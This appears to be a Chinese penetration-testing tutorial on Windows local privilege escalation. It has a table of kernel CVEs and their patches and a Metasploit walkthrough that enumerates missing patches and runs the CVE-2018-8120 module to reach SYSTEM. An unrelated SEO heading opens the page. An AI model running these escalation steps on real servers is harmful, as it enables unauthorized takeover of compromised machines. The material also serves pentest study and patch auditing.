深圳外贸网站建设口报关网站排名搜索
目录
内核溢出漏洞提权
实战MSF中CVE-2018-8120模块本地溢出漏洞提权
查看系统补丁
选择利用模块攻击
内核溢出漏洞提权
本地溢出提权首先要有服务器的一个普通用户权限,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出Administrator权限。以下是不同系统提权的漏洞和相应的补丁。
github上windows系统溢出漏洞提权的汇总:https://github.com/SecWiki/windows-kernel-exploits
| Windows Server 2003/xp | Windows Server 2008/7 | Windows Server 2012 |
|---|---|---|
| CVE-2018-8120(MS18-8120) | KB4131188 (MSF常用,有exe程序) | CVE-2018-8120(MS18-8120) | KB4131188 (MSF常用,有exe程序) | CVE-2018-8120(MS18-8120) | KB4131188 (MSF常用,有exe程序) |
| MS16-032 | KB3139914 MSF中限32位机器,有exe程序 | MS16-032 | KB3139914 MSF中限32位机器,有exe程序 | MS16-032 | KB3139914 MSF中限32位机器,有exe程序 |
| MS15-097 | KB3079904 MSF中没有利用exploit | MS16-016 | KB3124280 MSF限32位的Windows 7 SP1 | MS15-097 | KB3079904 MSF中没有利用exploit |
| MS15-077 | KB3077657 MSF中没有利用exploit | MS16-014 | KB3134228 MSF限32位的Windows 7 SP0/SP1 | MS15-077 | KB3077657 MSF中没有利用exploit |
| MS15-051 | KB3045171 MSF中限32位机器,有exe程序 | MS15-097 | KB3079904 MSF中没有利用exploit | MS15-051 | KB3045171 MSF中限32位机器,有exe程序 |
| MS14-058 | KB3000061 (CS中常用,MSF中只支持32位机器,有exe程序) | MS15-077 | KB3077657 MSF中没有利用exploit | MS14-058 | KB3000061 (CS中常用,MSF中只支持32位机器,有exe程序) |
| MS13-046 | KB2829361 MSF中没有利用exploit | MS15-051 | KB3045171 MSF中限32位机器,有exe程序 | MS13-046 | KB2829361 MSF中没有利用exploit |
| MS12-042 | KB2707511 sysret-pid MSF中没有利用exploit | MS14-058 | KB3000061 (CS中常用,MSF中只支持32位机器,有exe程序) | MS12-042 | KB2707511 sysret-pid MSF中没有利用exploit |
| MS12-020 | KB2621440 MSF中没有利用exploit | MS13-081|KB2870008 MSF限32位的Windows 7 SP0/SP1 |
|
| MS12-018 | KB2641653 MSF中没有利用exploit | MS13-046 | KB2829361 MSF中没有利用exploit |
|
| MS12-009 | KB2645640 MSF中没有利用exploit | MS13-053 | KB2850851 epathobj MSF限32位的Windows 7 SP0/SP1 |
|
| MS12-003 | KB2646524 MSF中没有利用exploit | MS13-005 | KB2778930 MSF限32位的系统 | |
| MS11-097 | KB2620712 MSF中没有利用exploit | MS12-042 | KB2707511 sysret-pid MSF中没有利用exploit | |
| MS11-080 | KB2592799 (MSF中只支持32位机器) | MS11-080 | KB2592799 (MSF中只支持32位机器) | |
| MS11-062 | KB2566454 MSF中没有利用exploit | MS10-092 | KB2305420 MSF限32位的系统 | |
| MS11-056 | KB2507938 MSF中没有利用exploit | ||
| MS11-046 | KB2503665 MSF中没有利用exploit | ||
| MS11-014 | KB2478960 MSF中没有利用exploit | ||
| MS11-011 | KB2393802 MSF中没有利用exploit | ||
| MS10-084 | KB2360937 MSF中没有利用exploit | ||
| MS10-015 | KB977165 Ms Viru MSF中只有Window2000SP4和win7 32位的exp | ||
| MS09-041 | KB971657 MSF中没有利用exploit | ||
| MS09-012 | KB952004 (PR提权) MSF中没有利用exploit | ||
| MS09-012 | KB956572 (巴西烤肉提权) MSF中没有利用exploit |
实战中最常用的本地溢出提权有 CVE-2018-8120、MS16-032、MS15-051 和 MS14-058 。在MSF中,最常用的提权模块是CVE-2018-8120;在CobaltStrike中,最常用的提权模块的是 MS14-058。这四个提权,都有对应的exe程序。exe程序均支持32和64位的机器。
实战MSF中CVE-2018-8120模块本地溢出漏洞提权
假设我们现在已经获得了一个Windows 2008 R2服务器的普通 xie 用户权限,现在我们要利用CVE-2018-8120 提权至最高权限。
查看系统补丁
方法一:输入shell进入到该主机的shell下,然后:systeminfo 查看系统详细信息,就可以看到补丁了
方法二:进入到 meterpreter 的shell下,执行 run post/windows/gather/enum_patches 可以直接查看哪些补丁没有打,但是由于这个模块还比较老,没有显示CVE-2018-8120的补丁号
MSF下还提供了 post/multi/recon/local_exploit_suggester 模块,该模块用于快速识别系统中可能被利用的漏洞
use post/multi/recon/local_exploit_suggester
set lhost x.x.x.x
set session 1
exploit
方法三:使用以下这条WMIC命令也可以查看补丁数量
wmic qfe get Caption,Description,HotFixID,InstalledOn
#也可以直接找是否存在cve-2018-8120对应的KB4131188补丁
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4131188"
可以看到,目标主机只打了2个补丁,并没有 cve-2018-8120 对应的KB4131188补丁,所以我们可以利用 cve-2018-8120 进行提权。
方法四:Windows Exploit Suggester
该工具可以将系统中已经安装的补丁程序与微软的漏洞数据库进行比较,并可以识别可能导致权限提升的漏洞,而其只需要目标系统的信息。
#更新漏洞数据库,会生成一个xls的文件,如下 2020-02-12-mssb.xls
python2 windows-exploit-suggester.py --update#查看目标主机系统信息,保存为sysinfo.txt文件
systeminfo > sysinfo.txt#然后运行如下命令,查看该系统是否存在可利用的提权漏洞
python2 windows-exploit-suggester.py -d 2020-02-12-mssb.xls -i sysinfo.txt
方法五:Sherlock脚本
#搜索所有未安装的补丁
Import-Module .\Sherlock.ps1;Find-AllVulns
#也可以搜索单个漏洞
Import-Module .\Sherlock.ps1;Find-MS14058
选择利用模块攻击
首先,输入 background 退回到MSF下,然后 search cve-2018-8120 ,可以看到找到了一个漏洞利用Exploit模块,我们使用该模块
use exploit/windows/local/ms18_8120_win32k_privesc
设置 session 为我们刚刚获得权限的 session ID,exploit 运行。可以看到,我们获得了 System 权限。
